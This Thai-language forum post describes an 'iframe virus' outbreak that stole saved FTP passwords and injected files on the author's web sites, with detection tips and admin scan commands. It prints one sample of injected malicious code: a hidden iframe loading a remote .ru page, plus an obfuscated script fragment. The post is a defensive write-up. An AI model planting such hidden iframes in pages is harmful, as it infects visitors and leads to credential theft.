|
โดนกับตัววันนี้เลยครับ
แค่เปิดเว็บที่ฝัง iframe ด้วย Firefox ติดทันทีเลยครับ
เดิมคิดว่ามีแต่เฉพาะคนใช้ IE ตอนนี้มีตัวใหม่ที่ใช้ Firefox ก็ิติดได้แล้วนะครับ
antivirus เด้งว่าพบไฟล์ trojan ใน temp ขึ้นมาติดๆกัน 4 ครั้ง เปลี่ยนชื่อไปเรื่อยๆ แล้วก็เงียบไป
ก็นึกว่าคงไม่มีอะไรปรากฎว่าเมื่อเช็ค ftp log เมื่อกี้ปรากฎว่าโดนไปหลาย user เลย (เก็บ password ไว้ใน filezilla แต่ไม่ได้เปิดโปรแกรม)
ตอนนี้เลยลบ user ใน filezilla ออกไว้ก่อน แล้วก็เปลี่ยน password ใหม่หมด
ดูจาก log โดนไป 4 user จาก 8 user ที่เก็บไว้ ดีว่าเครื่องนั้นไม่ค่อยได้ใช้เลยมี account save ไว้น้อย
น่าจะเป็น trojan ตัวใหม่ที่ antivirus ยังไม่รู้จัก
สรุปตอนนี้ไม่ว่าเปิดด้วย IE หรือ Firefox ถ้าใช้ Windows ก็เสี่ยงเหมือนกันหมด
ตอนนี้ก็ไล่แก้ไฟล์ index เอา iframe ออก เสร็จไป 3 ใน 4 เว็บแล้ว
สงสัยต้องไปเล่น OSx บน Mac ไม่ก็ Ubuntu 
ข้อมูลและการระบาดเกี่ยวกับ Virus iFrame
1. เครื่อง user เปิดเว็บที่ถูกแทรก iframe แล้วทำให้เครื่องติดไวรัส
2. ไวรัสทำการขโมยรหัสผ่าน ftp ไป (มีทั้งดักจับจากการรับส่งข้อมูลตอน login ftp และเอาไฟล์ config ของโปรแกรม ftp ที่ save ไว้ในเครื่องไป)
3. เว็บที่ถูกขโมยรหัสผ่านก็จะถูกเข้ามาแก้ไขไฟล์ index และ/หรือ ไฟล์ .php .html (เกือบ)ทั้งหมด โดยแทรก iframe เรียกไฟล์ไวรัสเพิ่มเข้าไป และ/หรือ มีการเอาไฟล์มาวางเพื่อการต่างๆ เช่นส่ง spam เมล์
4. คนที่เปิดเว็บที่ถูกฝัง iframe ติดไวรัสโดยไม่รู้ตัว ( = ข้อ1 )
การทำงานของ virus เท่าที่พบจะมี 2 แบบคือ
1. แก้ไขไฟล์ index .php .html .htm แทรก code iframe เพื่อกระจายไวรัส ที่พบมีอยู่หลายรูปแบบ ตัวอย่าง
<iframe src="http://a1b.ru:8080/index.php" width=145 height=199 style="visibility: hidden"></iframe>
<script unescapechar(....
โดยจะเพิ่มหลัง tag <body> หรือ ต้นไฟล์ หรือ บรรทัดสุดท้าย
2. วางไฟล์ใน cgi-bin เพื่อส่ง spam เมล์ออกไปจำนวนมาก ซึ่งจะมีผลเฉพาะกับเว็บที่เปิด cgi ไว้ ที่พบบ่อยคือ dark.cgi
การตรวจสอบ
แบบที่ 1
เวลาเปิดเว็บโปรแกรม antivirus จะแจ้งเตือน หรือถ้าเปิดด้วย firefox อาจจะพบเป็นหน้าถูก block สีแดงๆ (แต่ถ้าโดนฝัง virus ตัวใหม่ที่ antivirus ยังไม่ update ก็จะติดทันที)
view source ดูจะพบว่ามีการแทรก code iframe ตามตัวอย่างด้านบน
แบบที่ 2
จำนวน connection จะสูงผิดปกติเนื่องจากมีการส่งอีเมล์ออกไปจำนวนมาก และหากแก้ไขไม่ทันก็จะติด blacklist ในที่สุด
ตัวอย่างกราฟ ตามภาพ
หาก ssh เข้าไปดู top ก็จะพบ perl ทำงานอยู่จำนวนมาก
การป้องกันและแก้ไข
1. ติดตั้งโปรแกรม antivirus และหมั่น update data อย่างสม่ำเสมอ
2. ไม่ save รหัสผ่าน ftp ไว้ในโปรแกรม ftp
3. ถ้าติดแล้วให้หาเครื่องที่ปลอดภัยเปลี่ยนรหัสผ่าน user ที่ติดไวรัสใหม่
4. ประเภทแทรก script ให้แก้ไขเอา code ที่แทรกออกให้หมด
5. ถ้าเป็นไปได้ให้ใช้ Linux หรือ OSX แทน windows
6. เครื่องที่สามารถปิด ftp ได้ให้ปิดไว้และเปิดเฉพาะเวลาต้องการใช้งาน
7. ใช้ firewall block การใช้งาน ftp จาก ip ต่างประเทศทั้งหมด
8. เลี่ยงการใช้โปรแกรม crack ประเภท keygen
สำหรับ Admin
1. ปิด option cgi ในทุก user
2. scan หาไฟล์ .cgi .pl ใน folder cgi-bin
find /home/*/domains/*/public_html/cgi-bin/ -type f -print | grep -v "htaccess" > list.txt
3. scan หา iframe ใน public_html (หาแค่ไฟล์ index.php .html .htm ใน public_html ไม่หาใน folder ย่อยๆเพื่อประหยัดเวลา หากพบว่าเว็บใหนติดค่อยไปไล่หาใน folder ย่อยอีกที)
find /home/*/domains/*/public_html/ -maxdepth 1 -name index.php -exec grep -H "\<iframe" {} ";"
find /home/*/domains/*/public_html/ -maxdepth 1 -name index.html -exec grep -H "\<iframe" {} ";"
find /home/*/domains/*/public_html/ -maxdepth 1 -name index.htm -exec grep -H "\<iframe" {} ";"
4. ดู ftp log
Special Thanks : P'Man (KKE) @ THT
| 
คลังความรู้
